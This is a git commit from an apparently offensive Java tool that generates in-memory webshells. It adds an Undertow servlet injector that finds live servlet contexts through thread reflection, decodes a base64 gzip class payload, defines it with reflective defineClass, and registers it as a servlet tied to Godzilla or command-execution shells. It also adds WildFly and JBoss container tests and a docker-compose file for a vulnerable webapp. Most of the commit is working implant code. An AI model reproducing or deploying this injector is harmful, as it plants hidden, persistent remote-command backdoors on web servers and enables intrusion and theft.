feat: support undertow servlet (#2)

This commit is contained in:
ReaJason
2024-12-21 14:13:49 +08:00
parent 9f1f4b76aa
commit 12fde31663
9 changed files with 305 additions and 2 deletions
@@ -2,6 +2,7 @@ package com.reajason.javaweb.memshell;
import com.reajason.javaweb.buddy.ByPassJavaModuleInterceptor; import com.reajason.javaweb.buddy.ByPassJavaModuleInterceptor;
import com.reajason.javaweb.buddy.LogRemoveMethodVisitor; import com.reajason.javaweb.buddy.LogRemoveMethodVisitor;
import com.reajason.javaweb.buddy.ServletRenameVisitorWrapper;
import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper; import com.reajason.javaweb.buddy.TargetJreVersionVisitorWrapper;
import com.reajason.javaweb.config.InjectorConfig; import com.reajason.javaweb.config.InjectorConfig;
import com.reajason.javaweb.config.ShellConfig; import com.reajason.javaweb.config.ShellConfig;
@@ -47,6 +48,10 @@ public class InjectorGenerator {
builder = ByPassJavaModuleInterceptor.extend(builder); builder = ByPassJavaModuleInterceptor.extend(builder);
} }
if(config.isJakarta()){
builder = builder.visit(ServletRenameVisitorWrapper.INSTANCE);
}
if (config.isDebugOff()) { if (config.isDebugOff()) {
builder = LogRemoveMethodVisitor.extend(builder); builder = LogRemoveMethodVisitor.extend(builder);
} }
@@ -3,11 +3,14 @@ package com.reajason.javaweb.memshell;
import com.reajason.javaweb.config.Constants; import com.reajason.javaweb.config.Constants;
import com.reajason.javaweb.config.ShellTool; import com.reajason.javaweb.config.ShellTool;
import com.reajason.javaweb.memshell.shelltool.command.CommandFilter; import com.reajason.javaweb.memshell.shelltool.command.CommandFilter;
import com.reajason.javaweb.memshell.shelltool.command.CommandServlet;
import com.reajason.javaweb.memshell.shelltool.godzilla.GodzillaFilter; import com.reajason.javaweb.memshell.shelltool.godzilla.GodzillaFilter;
import com.reajason.javaweb.memshell.shelltool.godzilla.GodzillaServlet;
import com.reajason.javaweb.memshell.undertow.command.CommandListener; import com.reajason.javaweb.memshell.undertow.command.CommandListener;
import com.reajason.javaweb.memshell.undertow.godzilla.GodzillaListener; import com.reajason.javaweb.memshell.undertow.godzilla.GodzillaListener;
import com.reajason.javaweb.memshell.undertow.injector.UndertowFilterInjector; import com.reajason.javaweb.memshell.undertow.injector.UndertowFilterInjector;
import com.reajason.javaweb.memshell.undertow.injector.UndertowListenerInjector; import com.reajason.javaweb.memshell.undertow.injector.UndertowListenerInjector;
import com.reajason.javaweb.memshell.undertow.injector.UndertowServletInjector;
import org.apache.commons.lang3.tuple.Pair; import org.apache.commons.lang3.tuple.Pair;
import java.util.List; import java.util.List;
@@ -26,16 +29,24 @@ public class UndertowShell extends AbstractShell {
@Override @Override
protected Map<String, Pair<Class<?>, Class<?>>> getCommandShellMap() { protected Map<String, Pair<Class<?>, Class<?>>> getCommandShellMap() {
return Map.of( return Map.of(
Constants.SERVLET, Pair.of(CommandServlet.class, UndertowServletInjector.class),
Constants.JAKARTA_SERVLET, Pair.of(CommandServlet.class, UndertowServletInjector.class),
Constants.FILTER, Pair.of(CommandFilter.class, UndertowFilterInjector.class), Constants.FILTER, Pair.of(CommandFilter.class, UndertowFilterInjector.class),
Constants.LISTENER, Pair.of(CommandListener.class, UndertowListenerInjector.class) Constants.JAKARTA_FILTER, Pair.of(CommandFilter.class, UndertowFilterInjector.class),
Constants.LISTENER, Pair.of(CommandListener.class, UndertowListenerInjector.class),
Constants.JAKARTA_LISTENER, Pair.of(CommandListener.class, UndertowListenerInjector.class)
); );
} }
@Override @Override
protected Map<String, Pair<Class<?>, Class<?>>> getGodzillaShellMap() { protected Map<String, Pair<Class<?>, Class<?>>> getGodzillaShellMap() {
return Map.of( return Map.of(
Constants.SERVLET, Pair.of(GodzillaServlet.class, UndertowServletInjector.class),
Constants.JAKARTA_SERVLET, Pair.of(GodzillaServlet.class, UndertowServletInjector.class),
Constants.FILTER, Pair.of(GodzillaFilter.class, UndertowFilterInjector.class), Constants.FILTER, Pair.of(GodzillaFilter.class, UndertowFilterInjector.class),
Constants.LISTENER, Pair.of(GodzillaListener.class, UndertowListenerInjector.class) Constants.JAKARTA_FILTER, Pair.of(GodzillaFilter.class, UndertowFilterInjector.class),
Constants.LISTENER, Pair.of(GodzillaListener.class, UndertowListenerInjector.class),
Constants.JAKARTA_LISTENER, Pair.of(GodzillaListener.class, UndertowListenerInjector.class)
); );
} }
} }
@@ -0,0 +1,11 @@
services:
wildfly9:
image: jboss/wildfly:9.0.1.Final
container_name: wildfly9
ports:
- 8080:8080
- 5005:5005
environment:
JAVA_OPTS: -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -Xms64m -Xmx512m -XX:MaxPermSize=256m -Djava.net.preferIPv4Stack=true -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djboss.modules.system.pkgs=org.jboss.byteman -Djava.awt.headless=true -Djboss.server.default.config=standalone.xml
volumes:
- ../../../vul-webapp/build/libs/vul-webapp.war:/opt/jboss/wildfly/standalone/deployments/app.war
@@ -41,6 +41,10 @@ public class JbossEap7ContainerTest {
static Stream<Arguments> casesProvider() { static Stream<Arguments> casesProvider() {
return Stream.of( return Stream.of(
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP),
@@ -41,6 +41,8 @@ public class Wildfly18ContainerTest {
static Stream<Arguments> casesProvider() { static Stream<Arguments> casesProvider() {
return Stream.of( return Stream.of(
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
@@ -41,6 +41,8 @@ public class Wildfly23ContainerTest {
static Stream<Arguments> casesProvider() { static Stream<Arguments> casesProvider() {
return Stream.of( return Stream.of(
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
@@ -0,0 +1,64 @@
package com.reajason.javaweb.integration.wildfly;
import com.reajason.javaweb.config.Constants;
import com.reajason.javaweb.config.Server;
import com.reajason.javaweb.config.ShellTool;
import com.reajason.javaweb.memshell.packer.Packer;
import lombok.extern.slf4j.Slf4j;
import net.bytebuddy.jar.asm.Opcodes;
import org.junit.jupiter.api.AfterAll;
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.Arguments;
import org.junit.jupiter.params.provider.MethodSource;
import org.testcontainers.containers.GenericContainer;
import org.testcontainers.containers.wait.strategy.Wait;
import org.testcontainers.junit.jupiter.Container;
import org.testcontainers.junit.jupiter.Testcontainers;
import java.util.stream.Stream;
import static com.reajason.javaweb.integration.ContainerTool.getUrl;
import static com.reajason.javaweb.integration.ContainerTool.warJakartaFile;
import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException;
import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.junit.jupiter.params.provider.Arguments.arguments;
/**
* @author ReaJason
* @since 2024/12/10
*/
@Slf4j
@Testcontainers
public class Wildfly30ContainerTest {
public static final String imageName = "quay.io/wildfly/wildfly:30.0.1.Final-jdk17";
@Container
public static final GenericContainer<?> container = new GenericContainer<>(imageName)
.withCopyToContainer(warJakartaFile, "/opt/jboss/wildfly/standalone/deployments/app.war")
.waitingFor(Wait.forHttp("/app"))
.withExposedPorts(8080);
static Stream<Arguments> casesProvider() {
return Stream.of(
arguments(imageName, Constants.JAKARTA_SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.JAKARTA_SERVLET, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.JAKARTA_FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.JAKARTA_FILTER, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.JAKARTA_LISTENER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.JAKARTA_LISTENER, ShellTool.Command, Packer.INSTANCE.JSP)
);
}
@AfterAll
static void tearDown() {
String logs = container.getLogs();
assertThat("Logs should not contain any exceptions", logs, doesNotContainException());
}
@ParameterizedTest(name = "{0}|{1}{2}|{3}")
@MethodSource("casesProvider")
void test(String imageName, String shellType, ShellTool shellTool, Packer.INSTANCE packer) {
testShellInjectAssertOk(getUrl(container), Server.Undertow, shellType, shellTool, Opcodes.V17, packer);
}
}
@@ -44,6 +44,10 @@ public class Wildfly9ContainerTest {
static Stream<Arguments> casesProvider() { static Stream<Arguments> casesProvider() {
return Stream.of( return Stream.of(
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.JSP),
arguments(imageName, Constants.SERVLET, ShellTool.Command, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.JSP),
arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine), arguments(imageName, Constants.FILTER, ShellTool.Godzilla, Packer.INSTANCE.ScriptEngine),
arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP), arguments(imageName, Constants.FILTER, ShellTool.Command, Packer.INSTANCE.JSP),
@@ -0,0 +1,200 @@
package com.reajason.javaweb.memshell.undertow.injector;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.GZIPInputStream;
/**
* @author ReaJason
* @since 2024/12/21
*/
public class UndertowServletInjector {
static {
new UndertowServletInjector();
}
public UndertowServletInjector() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object servlet = getShell(context);
inject(context, servlet);
}
} catch (Exception e) {
e.printStackTrace();
}
}
public String getUrlPattern() {
return "{{urlPattern}}";
}
public String getClassName() {
return "{{className}}";
}
public String getBase64String() throws IOException {
return "{{base64Str}}";
}
public List<Object> getContext() throws IllegalAccessException, NoSuchMethodException, InvocationTargetException {
List<Object> contexts = new ArrayList<Object>();
Thread[] threads = (Thread[]) invokeMethod(Thread.class, "getThreads", null, null);
for (Thread thread : threads) {
try {
Object requestContext = invokeMethod(thread.getContextClassLoader().loadClass("io.undertow.servlet.handlers.ServletRequestContext"), "current", null, null);
Object servletContext = invokeMethod(requestContext, "getCurrentServletContext", null, null);
if (servletContext != null) {
contexts.add(servletContext);
}
} catch (Exception ignored) {
}
}
return contexts;
}
@SuppressWarnings("all")
private Object getShell(Object context) throws Exception {
Object obj;
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
if (classLoader == null) {
classLoader = context.getClass().getClassLoader();
}
try {
obj = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
obj = clazz.newInstance();
}
return obj;
}
public void inject(Object context, Object servlet) throws Exception {
Object deploymentImpl = getFieldValue(context, "deployment");
Object managedServlets = invokeMethod(deploymentImpl, "getServlets", null, null);
Object servletHandler = invokeMethod(managedServlets, "getServletHandler", new Class[]{String.class}, new Object[]{getClassName()});
if (servletHandler != null) {
System.out.println("servlet already injected");
return;
}
Class<?> servletInfoClass = Class.forName("io.undertow.servlet.api.ServletInfo");
Object deploymentInfo = getFieldValue(context, "deploymentInfo");
Object servletInfo = servletInfoClass.getConstructor(String.class, Class.class).newInstance(getClassName(), servlet.getClass());
invokeMethod(servletInfo, "addMapping", new Class[]{String.class}, new Object[]{getUrlPattern()});
invokeMethod(managedServlets, "addServlet", new Class[]{servletInfoClass}, new Object[]{servletInfo});
invokeMethod(deploymentInfo, "addServlet", new Class[]{servletInfoClass}, new Object[]{servletInfo});
Object servletPaths = invokeMethod(deploymentImpl, "getServletPaths", null, null);
Object data = invokeMethod(servletPaths, "setupServletChains", null, null);
setFieldValue(servletPaths, "data", data);
System.out.println("servlet inject success");
}
@SuppressWarnings("all")
public static byte[] decodeBase64(String base64Str) throws Exception {
Class<?> decoderClass;
try {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
}
}
@SuppressWarnings("all")
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
GZIPInputStream gzipInputStream = null;
try {
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
byte[] buffer = new byte[4096];
int n;
while ((n = gzipInputStream.read(buffer)) > 0) {
out.write(buffer, 0, n);
}
} finally {
if (gzipInputStream != null) {
try {
gzipInputStream.close();
} catch (IOException ignored) {
}
}
out.close();
}
return out.toByteArray();
}
@SuppressWarnings("all")
public static Field getField(Object obj, String name) throws NoSuchFieldException, IllegalAccessException {
for (Class<?> clazz = obj.getClass();
clazz != Object.class;
clazz = clazz.getSuperclass()) {
try {
return clazz.getDeclaredField(name);
} catch (NoSuchFieldException ignored) {
}
}
throw new NoSuchFieldException(name);
}
@SuppressWarnings("all")
public static Object getFieldValue(Object obj, String name) throws NoSuchFieldException, IllegalAccessException {
try {
Field field = getField(obj, name);
field.setAccessible(true);
return field.get(obj);
} catch (NoSuchFieldException ignored) {
}
return null;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
Field field = getField(obj, fieldName);
field.setAccessible(true);
field.set(obj, value);
}
@SuppressWarnings("all")
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) {
try {
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
Method method = null;
while (clazz != null && method == null) {
try {
if (paramClazz == null) {
method = clazz.getDeclaredMethod(methodName);
} else {
method = clazz.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
clazz = clazz.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException("Method not found: " + methodName);
}
method.setAccessible(true);
return method.invoke(obj instanceof Class ? null : obj, param);
} catch (Exception e) {
throw new RuntimeException("Error invoking method: " + methodName, e);
}
}
}